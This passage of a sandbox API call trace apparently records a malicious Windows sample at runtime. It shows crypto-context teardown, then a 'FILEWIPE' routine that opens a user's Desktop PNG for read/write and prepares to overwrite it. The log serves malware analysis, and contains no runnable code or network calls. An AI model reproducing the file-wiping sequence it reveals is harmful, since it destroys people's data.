dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0030.859] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.860] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.860] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.860] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.861] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.861] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.861] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0030.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.861] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.861] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.861] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0030.861] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.861] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0030.861] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.861] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.861] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0030.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.861] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.861] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.861] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.861] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0030.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0030.862] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.862] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0030.862] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0030.862] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0030.862] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0030.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0030.862] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.862] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0030.862] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.862] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0030.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.862] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.862] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.862] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.862] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0030.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0030.862] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.862] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0030.862] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0030.863] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.863] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0030.863] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.863] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0030.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0030.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0030.863] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.863] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.863] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0030.863] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.863] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0030.863] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0030.863] FreeLibrary (hLibModule=0x754b0000) returned 1 [0030.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0030.863] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0030.863] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0030.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.864] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.864] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.864] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.864] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0030.864] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0030.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0030.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0030.865] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.865] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.865] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf602e3f0, ftCreationTime.dwHighDateTime=0x1d5c1df, ftLastAccessTime.dwLowDateTime=0x4adcad20, ftLastAccessTime.dwHighDateTime=0x1d5bb7d, ftLastWriteTime.dwLowDateTime=0x4adcad20, ftLastWriteTime.dwHighDateTime=0x1d5bb7d, nFileSizeHigh=0x0, nFileSizeLow=0x3153, dwReserved0=0x0, dwReserved1=0x777648, cFileName="DQ5aP.png", cAlternateFileName="")) returned 0x7c2240 [0030.865] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0030.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0030.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0030.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0030.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0030.865] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.865] CharLowerBuffW (in: lpsz="byte[12627]", cchLength=0xb | out: lpsz="byte[12627]") returned 0xb [0030.865] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.865] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0030.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0030.865] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.865] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0030.865] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0030.865] FreeLibrary (hLibModule=0x76b40000) returned 1 [0030.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0030.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0030.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0030.866] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.866] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.866] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.866] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0030.866] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.866] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.866] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.867] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.867] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0030.867] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.868] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\DQ5aP.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\dq5ap.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0030.868] FreeLibrary (hLibModule=0x76e10000) returned 1 [0030.868] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0030.868] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0030.868] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0030.868] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0030.868] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0030.868] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.868] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0030.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0030.869] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0030.869] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0030.869] RtlAllocateHeap (HeapHandle=0x770000, 